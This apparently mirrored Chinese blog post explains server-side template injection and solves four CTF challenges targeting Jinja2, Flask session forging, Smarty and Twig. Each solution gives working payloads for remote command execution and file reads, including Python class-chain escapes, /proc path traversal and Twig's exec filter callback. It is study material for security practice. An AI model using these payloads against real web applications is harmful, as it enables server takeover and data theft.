SSTI模板注入+CTF实例

news2024/11/24 11:58:31

参考文章: 

一文了解SSTI和所有常见payload 以flask模板为例-腾讯云开发者社区-腾讯云 (tencent.com)

python-flask模块注入(SSTI) - ctrl_TT豆 - 博客园 (cnblogs.com)

ssti详解与例题以及绕过payload大全_ssti绕过空格-CSDN博客

1. SSTI(模板注入)漏洞(入门篇) - bmjoker - 博客园 (cnblogs.com)

SSTI服务端模板注入漏洞原理详解及利用姿势集锦 - 2ha0yuk7on - 博客园 (cnblogs.com)


基础概念理解(以flask模板为例)

  • 模板引擎用于使用动态数据呈现内容。模板包括Ruby,Java,Twig,Smarty,AngularJS,Tornado,Flask/jinja2,Django,thymeleaf等。
  • 就像SQL注入一样,攻击者通过在注入点构造恶意的sql语句去读取数据库数据。攻击者在进行SSTI攻击时,构造恶意的模板代码去干预模板渲染的过程,也会造成敏感信息泄露等问题

payload基础

sql注入中会有information.schema这样的重要库去爆出敏感信息,模板注入借助的是各个类之间的继承关系和一些重要的魔术方法,而object类是所有类的父类。

# 基本payload
().__class__.__bases__[0].__subclasses__()[40]('/etc/passwd').read()

## [].__class__:根据前面的变量形式可以得到其所属的类<class 'list'>
__class__:返回一个实例所属的类

## __bases__[0]:获取object父类
__base__:返回该对象所继承的基类
__mro__:和__bases__一样,返回所有的父类

## __subclasses__()[40]:获取所有子类,在所有子类中获取可以利用的类
__subclasses__:以列表返回类的子类

## [40]('/etc/passwd').read():在类中获取可以利用的方法,执行命令
这里利用的是file类的read方法

绕过姿势

SSTI漏洞利用及绕过总结(绕过姿势多样)_java ssti漏洞-CSDN博客

CTF实例

BUUCTF-NewStarCTF2023-week3-GenShin(jinja2)

1.一开始用dirsearch去扫描目录,发现有/robots.txt和/console文件,以为有用,但是这道题考察的是ssiti注入。

2.看wp才知道,在根目录下有敏感目录/secr3tofpop,访问后需要输入name参数,这里有注入点。先用{{7*7}}尝试,发现被过滤。

 3.最终payload:

?name={%print([].__class__.__base__.__subclasses__()[132].__enter__.__globals__["pop"+"en"]("cat%20/flag").read())%}

 __subclasses__()[132]是os._wrap_close类,在第132个。这个类有popen方法,需要先使用__enter__方法再调用__globals__可以获取方法内以字典的形式返回的方法、属性等值。

BUUCTF-N1BOOK-第一章web入门 afr_3(flask session伪造)

1.页面一直进入到article,尝试输入?name=flag,显示no permission,应该是要更改cookie的session值。当输入index.php时,显示了index.php的路径:/home/nu11111111l/articles/index.php

2. 尝试使用../等来进行任意文件读取。

payload1:
?name=../../../proc/self/cmdline

 Linux系统上的/proc目录是一种文件系统,即proc文件系统,存储的是当前内核运行状态的一系列特殊文件,用户可以通过这些文件查看有关系统硬件及当前运行进程的信息,甚至可以通过更改其中这些文件来改变内核运行状态。

/proc/self 表示当前进程目录

/proc/self/cmdline 获取启动当前进程的完整命令。

 3.得到运行命令:python server.py,再通过以下命令查看源码

payload2:
?name=../../../../proc/self/cwd/server.py

cwd文件是一个指向当前进程运行目录的符号链接。可以通过查看cwd文件获取目标指定进程环境的运行目录。

4.分析源码,发现运行了两个文件:flag.py, key.py。访问flag.py还是显示no permission,访问key.py,得到密钥。

5.在n1page方法里用到了render_template_string()方法,并且也用到了格式化字符串,可以判断这里存在模板注入。 

在/n1page页面对post输入n1code进行了过滤,没有办法通过传入n1code的值来实现注入,但是可以直接更改session的值来操控输出,这里session被app.secret_key进行了加密。

ssti payload:
{'n1code': '{{\'\'.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__[\'os\'].popen(\'cat flag.py\').read()}}'}

 6.在这里要用kali下载flask-session-cookie-manager,执行命令:

BUUCTF-[CISCN2019 华东南赛区]Web11(smarty)

1.打开靶场,发现页面下方先是Build With Smarty !,说明模板引擎为smarty。

2.尝试修改XFF,用{$smarty.version}确认是否有漏洞,可以看到smarty的版本号。

3.因为smarty3已经弃用了{php}{/php}标签,所以这里用不了。

如果可以利用{php}{/php}标签,可以使用{php}{/php}标签来执行被包裹其中的php指令。

例如:{php}phpinfo();{/php}

 4.对于php5的环境可以用以下payload,但是这道题是php7,所以这种方法也不行

x-forwarded-for: <script language="php">system('cat /flag')</script>

5.还可以用静态方法,但是在这里也不行。

6. 最终用的是if标签,在标签里面放置php命令

payload1:
x-forwarded-for: {if system('cat /flag')}{/if}
或者直接用{system('cat /flag')}也可以得到flag

BUUCTF-[BJDCTF2020]Cookie is so stable(Twig)

1.根据题目,用bp抓包,可以发现在/flag.php随便输入123时,可以抓到两个请求包,第2个请求包会在cookie里添加user参数,应该存在注入点。判断模板引擎,先输入{{7*7}},回显49,再输入{{7*'7'}},还是回显49,为Twig模板。

2.用以下payload判断Twig模板的版本。

        Twig1.x的模板注入就是利用_self.env中的方法进行注入,_self会返回当前模板的实例,env会指向Twig_Environment,所以就是利用Twig_Environment中的其他方法。

        因为在Twig 2.x及Twig 3.x,_self的作用发生了变化,只能返回当前实例名字符串,所以以下payload只能适用于Twig 1.x。

payload1:
Cookie:user={{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}

3. 最后用以下payload得到flag。

payload:
Cookie: user={{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2205621.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

C语言基础语法——数值表示

进制 进制也就是进位制&#xff0c;是人们规定的一种进位方法对于任何一种进制—X进制&#xff0c;就表示某一位置上的数运算时是逢X进一位 十进制是逢十进一&#xff0c;十六进制是逢十六进一&#xff0c;二进制就是逢二进一&#xff0c;以此类推&#xff0c;x进制就是逢x进位…

CANoe 中控制外部程序的启动与停止

在汽车电子测试和开发中&#xff0c;CANoe 是一个强大的工具&#xff0c;能够模拟和测试各种网络协议。为了增强其功能&#xff0c;开发者常常需要在 CANoe 中启动和停止外部程序。本文将介绍如何通过 CANoe 的系统变量和脚本功能实现这一目标&#xff0c;并结合批处理文件来管…

深信服上网行为管理AC无法注销在线用户

下图用户认证成功后无法注销 很多入网的用户都是使用的这个账号 针对单个IP强制注销也不生效 解决步骤&#xff1a; 接入管理-用户管理-用户绑定管理-用户绑定 删除绑定免认证的配置 删除后所有用户会强制注销掉&#xff0c;重新登录即可 可添加主页联系方式帮忙远程解决问…

vue使用table实现动态数据报表(行合并)

<template><div class"previewTable"><h2>***项目研发数据报告</h2><table id"previewTable" width"100%"><tr><th>项目名称</th><td colspan"6">{{ resultData.proName }}<…

Linux_kernel中断系统13

一、温故知新 1、字符设备编程框架 什么是字符设备&#xff1f; 在Linux操作系统中文件类型为.c文件&#xff0c;称为字符设备文件 按字节访问 访问的顺序是固定的 1&#xff09;struct cdev结构 实现一个硬件字符设备的驱动程序时&#xff0c;实际上就是实例化一个stru…

闪迪U盘误删的数据该怎么恢复呢?3个方法轻松解决

闪迪是一家全球知名的美国公司&#xff0c;也是全球最大的闪存数据存储卡产品供应商&#xff0c;其中&#xff0c;闪迪U盘作为其主要产品之一&#xff0c;因其便携性、大容量和高速传输能力而深受用户喜爱。然而&#xff0c;在平时存储重要数据的时候&#xff0c;会因为我们一系…

Ngin入门套餐

快速了解Nginx 一、代理1.1 正向代理1.2 反向代理1.3 正向代理和反向代理的区别 二、Nginx负载均衡策略2.1 轮询&#xff08;Round Robin&#xff09;2.2 加权轮询&#xff08;Weighted Round Robin&#xff09;2.3 IP 哈希&#xff08;IP Hash&#xff09;2.4 最少连接&#x…

C语言 | Leetcode C语言题解之第462题最小操作次数使数组元素相等II

题目&#xff1a; 题解&#xff1a; static inline void swap(int *a, int *b) {int c *a;*a *b;*b c; }static inline int partition(int *nums, int left, int right) {int x nums[right], i left - 1;for (int j left; j < right; j) {if (nums[j] < x) {swap(…

Spring17——Spring事务简介、使用事务实现模拟转账业务

38-Spring事务简介 相关概念 事务作用&#xff1a;在数据层保障一系列的数据库操作同成功同失败Spring事务作用&#xff1a;在数据层或业务层保障一系列的数据库操作同时成功或同时失败 数据层有事务我们可以理解&#xff0c;为什么业务层也需要处理事务呢&#xff1f;举个简…

黑马点评(更新中)

黑马点评 1、短信登录 Session实现1.1 分析1.2、Session实现的缺点1.3、其中的问题1.3.1、session覆盖1.3.2、在拦截之后remove User的作用 2、用Redis实现短信登录2.1 分析2.2 代码以及问题2.2.1 String问题2.2.2 刷新问题2.2.3 注入对象问题2.2.4 拦截器order问题 3、缓存3.1…

6个设计师都在用的样机素材网站

设计师都在哪里找样机素材&#xff1f;推荐6个样机素材网站&#xff0c;免费下载&#xff0c;赶紧收藏好&#xff01; 1、菜鸟图库 样机图片素材-样机图片模板免费下载 - 菜鸟图库 菜鸟图库有多种类型的设计素材&#xff0c;像平面、电商、UI、办公等素材这里面都能找到&#…

若依-二级页面的跳转设计

配置二级路由页面&#xff0c;就是点击了某个按钮之后会跳转到一个页面中去&#xff0c;比如需要点击查看详情的时候就可以进行页面的跳转。 点击字典类型 进入到字典数据页面。这个页面在左侧是没有的&#xff0c;在导航栏会有展示出来。 在index.js中配置的代码 //path 当前的…

从新手到专家,Tableau Agent 如何满足不同用户的分析需求?

为什么要构建 Tableau Agent&#xff1f;Tableau 对话式 AI 助理如何助你加速分析&#xff1f; 正在查询相关数据和现有仪表板&#xff0c;看看能否解答业务问题&#xff1f; 还在持续准备、管理和编辑数据&#xff0c;以确保企业数据的质量和可访问性&#xff1f; 希望快速创…

SDH8323非隔离12V/15V/18V,300MA直插DIP7电源芯片

SDH8323 是高压启动&#xff0c;内置高压MOSFET的电流模式PWMPFM控制器&#xff0c;适用于Buck及Buck-Boost拓扑。 SDH8323 在轻载条件下降频工作&#xff0c;优化轻载条件下的转换效率。在极轻载及空载条件下工作于打嗝模式&#xff0c;从而有效地降低系统的待机功耗。 SDH832…

DIFY上使用多种大语言模型(MindCraft API)

注册MindCraft并创建API KEY 首先我们在智匠MindCraft上注册账号并创建API KEY&#xff0c;参考接口调用文档&#xff0c;查看我们能调用哪些模型。我们可以看到这个开发平台上整合了主流的大语言模型&#xff0c;并且是兼容openai接口的。 进入DIFY的设置界面 然后我们在DIFY上…

为何一个简单的线上商城 两年销售7000多万?

有一个销售百货的商城&#xff0c;他们的返现模式极为独特且富有吸引力。无论你消费多少&#xff0c;商城都会随机给你返还一定金额的钱&#xff0c;这个返还范围从10元到1000元不等&#xff0c;确实非常随意。 那么&#xff0c;这个商城采用如此随性的返现模式&#xff0c;业绩…

软件性能测试有哪些测试指标?性能测试第三方软件测评中心推荐

作为衡量软件质量的重要指标之一&#xff0c;软件的性能是一种非功能特性&#xff0c;不关心系统是否可以完成特定的功能&#xff0c;而只关心软件系统在运行时的速度是否足够快、是否消耗足够少的资源&#xff0c;因此软件性能测试至关重要。性能测试是指软件测试人员根据产品…

监控台操作台在哪些企业中应用比较广泛

在现代企业管理中&#xff0c;监控台操作台作为一种集成了视频监控、音频监听、数据分析及远程控制等多种功能的综合性操作平台&#xff0c;正逐渐成为众多企业不可或缺的重要设备。其广泛的应用领域不仅提升了企业的运营效率&#xff0c;还极大地增强了企业的安全性能。 一、安…

淘宝程序员没活硬整?在 Excel 和 VSCode 中购物!

大家好&#xff0c;我是程序员鱼皮&#xff0c;最近某宝网站的改进&#xff0c;属实是有点 “新” 了。 你敢相信这是一个购物网站么&#xff1f; 你可以在 Excel 表格中挑选商品进行购物&#xff0c;还原度极高&#xff0c;这两个图表更是点睛之笔。哪个天才想出来的&#xf…

C++Linux项目推荐-Web多人聊天+MySQL+Redis+Websocket+Json,可以写简历的C++项目

1 项目地址 项目配套视频简介&#xff1a;程序员老廖的个人空间-程序员老廖个人主页-哔哩哔哩视频 (bilibili.com) 1.1 项目原有功能 https://github.com/anarthal/servertech-chat.git 功能&#xff1a; 支持HTTP请求&#xff0c;掌握HTTP API json的请求相应 支持Webso…